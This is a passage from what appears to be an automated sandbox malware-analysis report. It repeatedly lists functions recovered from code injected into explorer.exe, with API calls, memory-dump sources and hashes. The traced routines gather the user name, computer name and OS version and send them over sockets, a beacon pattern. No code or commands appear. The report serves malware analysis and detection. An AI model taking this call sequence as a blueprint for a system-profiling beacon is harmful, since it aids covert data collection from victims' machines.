                                                                                                                                                                                                                          • Part of subcall function 0DFD4450: malloc.MSVCRT ref: 0DFD4460
                                                                                                                                                                                                                          • Part of subcall function 0DFD4450: free.MSVCRT ref: 0DFD4480
                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0DFD46E9
                                                                                                                                                                                                                        • _errno.MSVCRT ref: 0DFD46EF
                                                                                                                                                                                                                        • strtod.MSVCRT ref: 0DFD470D
                                                                                                                                                                                                                        • _errno.MSVCRT ref: 0DFD476A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$freeisdigitmallocmemcpystrtodtolower
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3554981057-0
                                                                                                                                                                                                                        • Opcode ID: eb719943a006e7c47c6f7b8d1fbfdbe5fe472ac3c1273932a2dddfb86f4e4f71
                                                                                                                                                                                                                        • Instruction ID: e1392e4d055e06fb5690c4adf4a7bb27888611e950f5f5ebb5f8c543e0ebe40e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb719943a006e7c47c6f7b8d1fbfdbe5fe472ac3c1273932a2dddfb86f4e4f71
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35419C32A04B9086EB61DF29E85472E7AA6F385B80F45C416EE8647758EF7CC0C4CB40
                                                                                                                                                                                                                        Function 0DEF45F0 Relevance: 13.6, APIs: 9, Instructions: 120stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DEF47B0: isdigit.MSVCRT ref: 0DEF47D7
                                                                                                                                                                                                                        • tolower.MSVCRT ref: 0DEF4668
                                                                                                                                                                                                                          • Part of subcall function 0DEF4450: malloc.MSVCRT ref: 0DEF4460
                                                                                                                                                                                                                          • Part of subcall function 0DEF4450: free.MSVCRT ref: 0DEF4480
                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0DEF46E9
                                                                                                                                                                                                                        • _errno.MSVCRT ref: 0DEF46EF
                                                                                                                                                                                                                        • strtod.MSVCRT ref: 0DEF470D
                                                                                                                                                                                                                        • _errno.MSVCRT ref: 0DEF476A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$freeisdigitmallocmemcpystrtodtolower
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3554981057-0
                                                                                                                                                                                                                        • Opcode ID: eb719943a006e7c47c6f7b8d1fbfdbe5fe472ac3c1273932a2dddfb86f4e4f71
                                                                                                                                                                                                                        • Instruction ID: 3b8738643afd5f73bdabc734627c0d704ed47da1d9f849f3584e42d117e697e1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb719943a006e7c47c6f7b8d1fbfdbe5fe472ac3c1273932a2dddfb86f4e4f71
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C641D032204B5186EB21DF66E84472E7AA5F385BC4F429026EF86437D4EF7CC184CB60
                                                                                                                                                                                                                        Function 0B0A45F0 Relevance: 13.6, APIs: 9, Instructions: 120stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0B0A47B0: isdigit.MSVCRT ref: 0B0A47D7
                                                                                                                                                                                                                        • tolower.MSVCRT ref: 0B0A4668
                                                                                                                                                                                                                          • Part of subcall function 0B0A4450: malloc.MSVCRT ref: 0B0A4460
                                                                                                                                                                                                                          • Part of subcall function 0B0A4450: free.MSVCRT ref: 0B0A4480
                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0B0A46E9
                                                                                                                                                                                                                        • _errno.MSVCRT ref: 0B0A46EF
                                                                                                                                                                                                                        • strtod.MSVCRT ref: 0B0A470D
                                                                                                                                                                                                                        • _errno.MSVCRT ref: 0B0A476A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$freeisdigitmallocmemcpystrtodtolower
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3554981057-0
                                                                                                                                                                                                                        • Opcode ID: 661ff6e15e55d5f87a73f8ab827580be280244a44d9fe6fd24e0a8d75ea9ec05
                                                                                                                                                                                                                        • Instruction ID: 10e09ca08a964280b33d694ed8c23a815268ad4e5f0421efd586e5eb2046cad5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 661ff6e15e55d5f87a73f8ab827580be280244a44d9fe6fd24e0a8d75ea9ec05
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B641C13A604BA08AEB25DFA5E85472E7AA5F385FC0F418816DE5643754EFFCD085CB40
                                                                                                                                                                                                                        Function 0DFD9200 Relevance: 13.6, APIs: 9, Instructions: 107stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 0DFD9248
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0DFD9255
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0DFD928A
                                                                                                                                                                                                                          • Part of subcall function 0DFDECD0: GetWindowsDirectoryA.KERNEL32 ref: 0DFDED1C
                                                                                                                                                                                                                          • Part of subcall function 0DFDECD0: GetVolumeInformationA.KERNEL32 ref: 0DFDED66
                                                                                                                                                                                                                          • Part of subcall function 0DFDECD0: wsprintfA.USER32 ref: 0DFDEDC7
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0DFD92AD
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFD92BD
                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 0DFD9354
                                                                                                                                                                                                                          • Part of subcall function 0DFD9420: EnterCriticalSection.KERNEL32 ref: 0DFD942B
                                                                                                                                                                                                                          • Part of subcall function 0DFD9420: LeaveCriticalSection.KERNEL32 ref: 0DFD945B
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: send.WS2_32 ref: 0DFD729C
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: recv.WS2_32 ref: 0DFD7303
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcmpiA.KERNEL32 ref: 0DFD7363
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrlenA.KERNEL32 ref: 0DFD7387
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: StrStrA.SHLWAPI ref: 0DFD739F
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcmpiA.KERNEL32 ref: 0DFD73BE
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: strtol.MSVCRT ref: 0DFD73D6
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFD92CD
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcpyA.KERNEL32 ref: 0DFD70CE
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcatA.KERNEL32 ref: 0DFD70DF
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcatA.KERNEL32 ref: 0DFD70F3
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcatA.KERNEL32 ref: 0DFD7107
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcatA.KERNEL32 ref: 0DFD7118
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcatA.KERNEL32 ref: 0DFD712C
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcatA.KERNEL32 ref: 0DFD714A
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: wsprintfA.USER32 ref: 0DFD7162
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcatA.KERNEL32 ref: 0DFD7176
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcatA.KERNEL32 ref: 0DFD718A
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrcatA.KERNEL32 ref: 0DFD71C6
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: WSAStartup.WS2_32 ref: 0DFD71D6
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: socket.WS2_32 ref: 0DFD71F2
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: gethostbyname.WS2_32 ref: 0DFD7209
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: memcpy.MSVCRT ref: 0DFD7229
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: htons.WS2_32 ref: 0DFD7238
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: connect.WS2_32 ref: 0DFD724F
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: lstrlenA.KERNEL32 ref: 0DFD7265
                                                                                                                                                                                                                          • Part of subcall function 0DFD7070: send.WS2_32 ref: 0DFD727B
                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0DFD936C
                                                                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 0DFD937A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$CriticalSection$lstrcpylstrlen$EnterLeavelstrcmpimemcpysendwsprintf$DirectoryInformationInitializeStartupVolumeWindowsconnectgethostbynamehtonsrecvsocketstrtol
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1973528353-0
                                                                                                                                                                                                                        • Opcode ID: 0dbcf65caac76370d19fda381bb2748fd0743ccba9b3d65d8d807d26070440cb
                                                                                                                                                                                                                        • Instruction ID: 1433b818758d763b0150fe09ef425e703be07a5d66eecf5458712fb015f97581
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0dbcf65caac76370d19fda381bb2748fd0743ccba9b3d65d8d807d26070440cb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E513A3120ABC181EB44DB94F85435A77A6FB89784F444856DB8EAB768DFB8C189CB40
                                                                                                                                                                                                                        Function 0DEF9200 Relevance: 13.6, APIs: 9, Instructions: 107stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 0DEF9248
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0DEF9255
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0DEF928A
                                                                                                                                                                                                                          • Part of subcall function 0DEFECD0: GetWindowsDirectoryA.KERNEL32 ref: 0DEFED1C
                                                                                                                                                                                                                          • Part of subcall function 0DEFECD0: GetVolumeInformationA.KERNEL32 ref: 0DEFED66
                                                                                                                                                                                                                          • Part of subcall function 0DEFECD0: wsprintfA.USER32 ref: 0DEFEDC7
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0DEF92AD
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DEF92BD
                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 0DEF9354
                                                                                                                                                                                                                          • Part of subcall function 0DEF9420: EnterCriticalSection.KERNEL32 ref: 0DEF942B
                                                                                                                                                                                                                          • Part of subcall function 0DEF9420: LeaveCriticalSection.KERNEL32 ref: 0DEF945B
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: send.WS2_32 ref: 0DEF729C
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: recv.WS2_32 ref: 0DEF7303
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcmpiA.KERNEL32 ref: 0DEF7363
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrlenA.KERNEL32 ref: 0DEF7387
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: StrStrA.SHLWAPI ref: 0DEF739F
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcmpiA.KERNEL32 ref: 0DEF73BE
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: strtol.MSVCRT ref: 0DEF73D6
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DEF92CD
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcpyA.KERNEL32 ref: 0DEF70CE
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcatA.KERNEL32 ref: 0DEF70DF
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcatA.KERNEL32 ref: 0DEF70F3
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcatA.KERNEL32 ref: 0DEF7107
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcatA.KERNEL32 ref: 0DEF7118
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcatA.KERNEL32 ref: 0DEF712C
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcatA.KERNEL32 ref: 0DEF714A
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: wsprintfA.USER32 ref: 0DEF7162
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcatA.KERNEL32 ref: 0DEF7176
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcatA.KERNEL32 ref: 0DEF718A
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrcatA.KERNEL32 ref: 0DEF71C6
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: WSAStartup.WS2_32 ref: 0DEF71D6
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: socket.WS2_32 ref: 0DEF71F2
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: gethostbyname.WS2_32 ref: 0DEF7209
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: memcpy.MSVCRT ref: 0DEF7229
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: htons.WS2_32 ref: 0DEF7238
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: connect.WS2_32 ref: 0DEF724F
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: lstrlenA.KERNEL32 ref: 0DEF7265
                                                                                                                                                                                                                          • Part of subcall function 0DEF7070: send.WS2_32 ref: 0DEF727B
                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0DEF936C
                                                                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 0DEF937A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$CriticalSection$lstrcpylstrlen$EnterLeavelstrcmpimemcpysendwsprintf$DirectoryInformationInitializeStartupVolumeWindowsconnectgethostbynamehtonsrecvsocketstrtol
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1973528353-0
                                                                                                                                                                                                                        • Opcode ID: 0dbcf65caac76370d19fda381bb2748fd0743ccba9b3d65d8d807d26070440cb
                                                                                                                                                                                                                        • Instruction ID: 4739414f381db0447576f3e79cdf407527239c433bb93460410317dc78d11dea
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0dbcf65caac76370d19fda381bb2748fd0743ccba9b3d65d8d807d26070440cb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93510A35208B8281EB10DF95F85036A77A5FB89B84F429127DA8E87774DF7DC249CB60
                                                                                                                                                                                                                        Function 00B5D805 Relevance: 12.6, APIs: 10, Instructions: 108COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2785702920.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b40000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2288870239-0
                                                                                                                                                                                                                        • Opcode ID: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                        • Instruction ID: fa817a7b6fde0ee5f27a332392b887bccb8a45636fb2a5bb08268869711b611a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79314434655E0A8FEBB8FB59E8A6F6933E0FB59317BA401D89805C2165CB7C984AC701
                                                                                                                                                                                                                        Function 02BFD805 Relevance: 12.6, APIs: 10, Instructions: 108COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2786722156.0000000002BE0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2be0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2288870239-0
                                                                                                                                                                                                                        • Opcode ID: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                        • Instruction ID: f3892ac3822db34c8e9576f57515eed943542390d37a7401160e9af9704630b6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23317734654E0B8FEBF8FB5DE8A5B6973A1F759319F9400988605C3165CB3CE449CB10
                                                                                                                                                                                                                        Function 0B9AD805 Relevance: 12.6, APIs: 10, Instructions: 108COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2800816052.000000000B990000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B990000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b990000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2288870239-0
                                                                                                                                                                                                                        • Opcode ID: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                        • Instruction ID: f9416aaf80fafb386fde3b009bef499fbf7a3d7acc5702160dee953d765d833e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F317734655E0A8FEBB8FB6DE9A6B6973A4FB99315F94002C8009C25A5CB3CD445D780
                                                                                                                                                                                                                        Function 0DFE53E0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetUserNameW.ADVAPI32 ref: 0DFE5499
                                                                                                                                                                                                                        • GetComputerNameW.KERNEL32 ref: 0DFE54B3
                                                                                                                                                                                                                          • Part of subcall function 0DFDF310: WideCharToMultiByte.KERNEL32 ref: 0DFDF353
                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNEL32 ref: 0DFE54DC
                                                                                                                                                                                                                        • GetVersionExA.KERNEL32 ref: 0DFE54ED
                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 0DFE553D
                                                                                                                                                                                                                          • Part of subcall function 0DFD9200: EnterCriticalSection.KERNEL32 ref: 0DFD9248
                                                                                                                                                                                                                          • Part of subcall function 0DFD9200: RtlInitializeCriticalSection.NTDLL ref: 0DFD9255
                                                                                                                                                                                                                          • Part of subcall function 0DFD9200: lstrcpyA.KERNEL32 ref: 0DFD928A
                                                                                                                                                                                                                          • Part of subcall function 0DFD9200: lstrcpyA.KERNEL32 ref: 0DFD92AD
                                                                                                                                                                                                                          • Part of subcall function 0DFD9200: lstrcatA.KERNEL32 ref: 0DFD92BD
                                                                                                                                                                                                                          • Part of subcall function 0DFD9200: lstrcatA.KERNEL32 ref: 0DFD92CD
                                                                                                                                                                                                                          • Part of subcall function 0DFD9200: LeaveCriticalSection.KERNEL32 ref: 0DFD9354
                                                                                                                                                                                                                          • Part of subcall function 0DFD9200: memcpy.MSVCRT ref: 0DFD936C
                                                                                                                                                                                                                          • Part of subcall function 0DFD9200: lstrlenA.KERNEL32 ref: 0DFD937A
                                                                                                                                                                                                                        • free.MSVCRT ref: 0DFE5551
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSection$Namelstrcatlstrcpy$ByteCharComputerEnterInfoInitializeLeaveMultiNativeSystemUserVersionWidefreelstrlenmemcpywsprintf
                                                                                                                                                                                                                        • String ID: 2.5
                                                                                                                                                                                                                        • API String ID: 2800961625-2233083363
                                                                                                                                                                                                                        • Opcode ID: e486100a408e8a09d9c892e745f7fcd54317b0b843c8af37b398ee0991724894
                                                                                                                                                                                                                        • Instruction ID: d0fabe94c1df95fec73f794f1cf8121d01c2ec7b5f2ff09a44ff81b0fa9c0408
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e486100a408e8a09d9c892e745f7fcd54317b0b843c8af37b398ee0991724894
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B417332614AC08AE720DF75E8547DEB7A5FB88788F854016EB8D5BA5CDF78C685CB00
                                                                                                                                                                                                                        Function 0DF053E0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetUserNameW.ADVAPI32 ref: 0DF05499
                                                                                                                                                                                                                        • GetComputerNameW.KERNEL32 ref: 0DF054B3
                                                                                                                                                                                                                          • Part of subcall function 0DEFF310: WideCharToMultiByte.KERNEL32 ref: 0DEFF353
                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNEL32 ref: 0DF054DC
                                                                                                                                                                                                                        • GetVersionExA.KERNEL32 ref: 0DF054ED
                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 0DF0553D
                                                                                                                                                                                                                          • Part of subcall function 0DEF9200: EnterCriticalSection.KERNEL32 ref: 0DEF9248
                                                                                                                                                                                                                          • Part of subcall function 0DEF9200: RtlInitializeCriticalSection.NTDLL ref: 0DEF9255
                                                                                                                                                                                                                          • Part of subcall function 0DEF9200: lstrcpyA.KERNEL32 ref: 0DEF928A
                                                                                                                                                                                                                          • Part of subcall function 0DEF9200: lstrcpyA.KERNEL32 ref: 0DEF92AD
                                                                                                                                                                                                                          • Part of subcall function 0DEF9200: lstrcatA.KERNEL32 ref: 0DEF92BD
                                                                                                                                                                                                                          • Part of subcall function 0DEF9200: lstrcatA.KERNEL32 ref: 0DEF92CD
                                                                                                                                                                                                                          • Part of subcall function 0DEF9200: LeaveCriticalSection.KERNEL32 ref: 0DEF9354
                                                                                                                                                                                                                          • Part of subcall function 0DEF9200: memcpy.MSVCRT ref: 0DEF936C
                                                                                                                                                                                                                          • Part of subcall function 0DEF9200: lstrlenA.KERNEL32 ref: 0DEF937A
                                                                                                                                                                                                                        • free.MSVCRT ref: 0DF05551
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSection$Namelstrcatlstrcpy$ByteCharComputerEnterInfoInitializeLeaveMultiNativeSystemUserVersionWidefreelstrlenmemcpywsprintf
                                                                                                                                                                                                                        • String ID: 2.5
                                                                                                                                                                                                                        • API String ID: 2800961625-2233083363
                                                                                                                                                                                                                        • Opcode ID: e486100a408e8a09d9c892e745f7fcd54317b0b843c8af37b398ee0991724894
                                                                                                                                                                                                                        • Instruction ID: 30ef7efbe781c88d8a869d48882b683b7116fdf8fa1d04371cf355792962165f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e486100a408e8a09d9c892e745f7fcd54317b0b843c8af37b398ee0991724894
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B418232614AC1CAE720DF61E8443DEB7A5FB88788F818016EB4E47A5CDF78C645CB10
                                                                                                                                                                                                                        Function 0DFF1ABB Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0DFF1AE6
                                                                                                                                                                                                                        • RaiseException.KERNEL32 ref: 0DFF1B0F
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0DFF1B70
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFF1AC3
                                                                                                                                                                                                                          • Part of subcall function 0DFEF930: _getptd_noexit.LIBCMT ref: 0DFEF936
                                                                                                                                                                                                                          • Part of subcall function 0DFEF930: _amsg_exit.LIBCMT ref: 0DFEF946
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFF1B75
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFF1B81
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
